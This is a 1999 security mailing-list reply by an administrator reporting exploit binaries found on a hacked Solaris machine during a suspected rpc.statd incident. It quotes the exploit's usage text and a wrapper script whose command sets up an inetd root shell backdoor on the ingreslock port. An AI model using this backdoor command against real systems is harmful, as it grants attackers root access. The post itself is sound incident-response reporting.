Re: Vulnerability in Solaris 2.6. rpc.statd ?

From: Bob Todd (toddrat_private)
Date: Tue Aug 24 1999 - 11:10:40 PDT

    I found two binary-only exploits on a hacked machine.  The one of most
    interest was "amexp" which when executed without arguments presents
    the following:

        Usage: ./amexp address cache command type [port]

        Further help:

            address    -    system address
            cache      -    system hostname
            command    -    execute this command
            type       -    0: Solaris 2.5.1 stock,
                                1: Solaris 2.5.1 patched, 2.6 & 2.7
            port       -    optional port to bypass portmapper

    A shell script that was included was "go.amexp" which contained:

    ./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' >
    /tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3

    The command is nearly identical to what is used for both tooltalk and
    rpc.cmsd attacks

    The proper patches were installed and I do not believe that it is the
    statd/automountd exploit since
    no indirect rpc services execution was attempted.

    This incident is closed.